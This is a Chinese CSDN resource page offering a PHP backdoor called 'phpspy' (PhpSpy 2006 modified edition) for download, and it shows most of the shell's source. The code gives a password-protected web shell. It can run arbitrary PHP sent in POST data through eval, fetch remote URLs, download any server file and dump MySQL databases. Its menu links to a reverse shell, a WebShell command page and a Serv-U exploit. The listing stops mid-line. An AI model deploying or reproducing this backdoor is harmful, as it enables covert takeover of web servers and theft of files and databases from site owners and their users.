一款php后门phpspy_phpspy.php资源-CSDN文库

共1个文件

php：1个

php后门

4星 · 超过85%的资源需积分: 50 54 浏览量 2007-10-29 09:31:47 上传评论收藏 18KB RAR 举报

资源推荐

资源详情

资源评论

收起资源包目录

2006.rar （1个子文件）

2006.php 60KB

<?php /** -------------------------------------------------------------------------------- /*===================== 程序配置 =====================*/ // 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效 $admin['check'] = "1"; // 如果需要密码验证,请修改登陆密码 $admin['pass'] = "7758521chang"; // 是否允许phpspy本身自动修改编辑后文件的时间为建立时间(yes/no) $retime = "no"; // 默认cmd.exe的位置,proc_open函数要使用的,linux系统请对应修改.(假设是winnt系统在程序里依然可以指定) $cmd = "cmd.exe"; // 下面是phpspy显示版权那栏的，因为被很多程序当成作为关键词杀了，鱼寒~~允许自定义吧。还是不懂别改~~ //$notice = "[<a href=\"http://www.51shell.cn\" title=\"浅蓝的辐射鱼\">Saiy</a>] [<a href=\"http://www.4gnel.net\" title=\"安全天使\">S4T</a>] [<a href=\"http://1v1.name\" title=\"7jdg\">7jdg</a>]<br><FONT color=#ff3300>声明:请勿使用本程序从事非法行为，否则后果自负！</font>"; $notice = "[<a href=\"http://www.kjsc.com.cn\" title=\"浅蓝的辐射鱼\">Saiy</a>] [<a href=\"http://www.kjsc.com.cn\" title=\"安全天使\">S4T</a>] [<a href=\"http://www.kjsc.com.cn\" title=\"7jdg\">7jdg</a>]<br><FONT color=#ff3300>声明:请勿使用本程序从事非法行为，否则后果自负！</font>"; /*===================== 配置结束 =====================*/ // 允许程序在 register_globals = off 的环境下工作 $onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals'); if ($onoff != 1) { @extract($_POST, EXTR_SKIP); @extract($_GET, EXTR_SKIP); } $self = $_SERVER['PHP_SELF']; $dis_func = get_cfg_var("disable_functions"); /*===================== 身份验证 =====================*/ if($admin['check'] == "1") { if ($_GET['action'] == "logout") { setcookie ("adminpass", ""); echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">"; echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$self."\">三秒后自动退出或单击这里退出程序界面 >>></a></span>"; exit; } if ($_POST['do'] == 'login') { $thepass=trim($_POST['adminpass']); if ($admin['pass'] == $thepass) { setcookie ("adminpass",$thepass,time()+(1*24*3600)); echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">"; echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$self."\">三秒后自动跳转或单击这里进入程序界面 >>></a></span>"; exit; } } if (isset($_COOKIE['adminpass'])) { if ($_COOKIE['adminpass'] != $admin['pass']) { loginpage(); } } else { loginpage(); } } /*===================== 验证结束 =====================*/ // 判断 magic_quotes_gpc 状态 if (get_magic_quotes_gpc()) { $_GET = stripslashes_array($_GET); $_POST = stripslashes_array($_POST); } // 查看PHPINFO if ($_GET['action'] == "phpinfo") { echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看<PHP环境变量>"; exit; } if($_GET['action'] == "nowuser") { $user = get_current_user(); if(!$user) $user = "报告长官，主机变态，无法获取当前进行用户名！"; echo"当前进程用户名：$user"; exit; } if(isset($_POST['phpcode'])){ eval("?".">$_POST[phpcode]<?"); exit; } // HUI20.CN if (isset($_POST['url'])) { $proxycontents = @file_get_contents($_POST['url']); echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>"; exit; } // 下载文件 if (!empty($downfile)) { if (!@file_exists($downfile)) { echo "<script>alert('你要下的文件不存在!')</script>"; } else { $filename = basename($downfile); $filename_info = explode('.', $filename); $fileext = $filename_info[count($filename_info)-1]; header('Content-type: application/x-'.$fileext); header('Content-Disposition: attachment; filename='.$filename); header('Content-Description: PHP Generated Data'); header('Content-Length: '.filesize($downfile)); @readfile($downfile); exit; } } // 直接下载备份数据库 if ($_POST['backuptype'] == 'download') { @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); @mysql_select_db($dbname) or die("选择数据库失败"); $table = array_flip($_POST['table']); $result = mysql_query("SHOW tables"); echo ($result) ? NULL : "出错: ".mysql_error(); $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql"); header('Content-type: application/unknown'); header('Content-Disposition: attachment; filename='.$filename); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { $mysqldata.= sqldumptable($currow[0]); $mysqldata.= $mysqldata."\r\n"; } } mysql_close(); exit; } // 程序目录 $pathname=str_replace('\\','/',dirname(__FILE__)); // 获取当前路径 if (!isset($dir) or empty($dir)) { $dir = "."; $nowpath = getPath($pathname, $dir); } else { $dir=$_GET['dir']; $nowpath = getPath($pathname, $dir); } // 判断读写情况 $dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写"; $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : ""; $reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\">注册表操作</a>" : ""; $tb = new FORMS; ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>http://<? echo $_SERVER['HTTP_HOST'];?> PhpSpy 2006 修改版</title> <style type="text/css"> body{ BACKGROUND-COLOR: #F5F5F5; COLOR: #3F3849; font-family: "Verdana", "Tahoma", "宋体"; font-size: "12px"; line-height: "140%"; } TD {FONT-FAMILY: "Verdana", "Tahoma", "宋体"; FONT-SIZE: 12px; line-height: 140%;} .smlfont { font-family: "Verdana", "Tahoma", "宋体"; font-size: "11px"; } .INPUT { FONT-SIZE: "12px"; COLOR: "#000000"; BACKGROUND-COLOR: "#FFFFFF"; height: "18px"; border: "1px solid #666666"; padding-left: "2px"; } .redfont { COLOR: "#CA0000"; } A:LINK {COLOR: #3F3849; TEXT-DECORATION: none} A:VISITED {COLOR: #3F3849; TEXT-DECORATION: none} A:HOVER {COLOR: #FFFFFF; BACKGROUND-COLOR: #cccccc} A:ACTIVE {COLOR: #FFFFFF; BACKGROUND-COLOR: #cccccc} .top {BACKGROUND-COLOR: "#CCCCCC"} .firstalt {BACKGROUND-COLOR: "#EFEFEF"} .secondalt {BACKGROUND-COLOR: "#F5F5F5"} </style> <SCRIPT language=JavaScript> function CheckAll(form) { for (var i=0;i<form.elements.length;i++) { var e = form.elements[i]; if (e.name != 'chkall') e.checked = form.chkall.checked; } } function really(d,f,m,t) { if (confirm(m)) { if (t == 1) { window.location.href='?dir='+d+'&deldir='+f; } else { window.location.href='?dir='+d+'&delfile='+f; } } } </SCRIPT> </head> <body style="table-layout:fixed; word-break:break-all"> <center> <?php $test = ""; if(!$_GET['dir']) $dir = "./"; $tb->tableheader(); $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="center">'.date("Y年m月d日 h:i:s",time()).'</td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top'); $tb->tdbody('| <a href="?action=logout">注销登录</a> | <a href="?action=dir">Shell 目录</a> | <a href="?action=phpenv">环境变量</a> | <a href="?action=proxy">HUI20.CN</a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | '); $tb->tdbody('| <a href="?action=downloads">Http 文件下载</a> | <a href="?action=search&dir='.$dir.'">文件查找</a> | <a href="?action=eval">执行php脚本</a> | <a href="?action=sql">执行SQL语句</a> | <a href="?action=sql&type=fun">Func反弹Shell</a> | <a href="?action=sqlbak">MySQL Backup</a> | <a href="?action=SUExp">Serv-U EXP</a> |'); $tb->tablefooter(); ?> <hr width="775" noshade> <table width="775" border="0" cellpadding="0"> <? $tb->headerform(array('method'=>'GET','content'=>'<p>程序路径: '.$pathname.'<br>当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>跳转目录: '.$tb->make

评论收藏

内容反馈